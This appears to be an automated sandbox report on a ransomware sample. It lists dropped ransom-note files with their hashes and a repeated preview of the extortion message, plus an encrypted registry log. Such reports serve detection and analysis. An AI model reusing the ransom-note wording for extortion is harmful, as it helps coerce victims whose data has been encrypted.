          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Program Files (x86)\Microsoft SQL Server\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Program Files (x86)\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Program Files\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Recovery\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Default\Desktop\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Default\Documents\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Default\Downloads\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Default\Favorites\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Default\Links\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Default\Music\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Default\NTUSER.DAT.LOG1
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):57576
          Entropy (8bit):7.9967612790440015
          Encrypted:true
          SSDEEP:1536:vPdyaRoGas1a+D5xLSxQdaXafUNWw1DiOme6Z+b:McdzDLSydBwue6gb
          MD5:6DA85E5486469464AB62C13D8586F55C
          SHA1:F26B562A26D70C286574599C02EF629BCD9B223C
          SHA-256:C9CD37432616FEB68566448BD6D6705A0A6142266D7BAC384FE37CC1ABA5589D
          SHA-512:60345C22D5E2BBCC60E75B3ADF904371452250BC148F13621FB786523FA7856A06ACC6F9AAE3D539C80986DE902124B7B47317678118CDBB2F4F49D8E36FBDE7
          Malicious:false
          Reputation:low
          Preview: #...%....c..)...<.|N...xW.....'...........TfdP..D...f.<..y.W.c..n......"[.......}.m...v:...&....S.../`h8...B...._-.U..L.t....Nk...-X.....r6.^.F.......m........4...]M.T...hv.......#....\...(.Et..."F.....+T.].i\O..........*.f+B."......dCT.r8......!..8|.Y..s.h..M7..E{.y.^...h.3`..,.,l..+.eu.*q!..H\.....R...%......S..:.40U.0.x..].(..1Z.fB..._.^L.6A..5.].w./..*..W......sNE.O....*..x.c{4"LO....e....y..D...i.....d).}--....ciE.Km.*R......9..m.NL..o..D......}.n..`|.F..........6...].Wd.Q.{..k.....F=.]!...D#.jg.mt.-......?........M.[....i.A........y..y.52I...CP..v.0.S.#n.`>..pk.ub8.Z..r.5.!u..4.v..............-.J...=.7.S.....W.}.W,$.EytU/&.T..8.k=N.E...kZ......;.*..%U..........t...Z.....&...4.^.FE...)...09..B.,.4..rg.. Zhy{...0.Z....S:.V.s..r.4==7ym#.E.y.[ @>...Euk...X.R....gu....].....C..3.8'...AwP..0"....r.*......".....fR7..46.X ...U..Jk5[...4k...]...k<y..Y.O...29.8..."..pG.......].p...BU.U=d..JE...q.,........?...[{...i.....S. 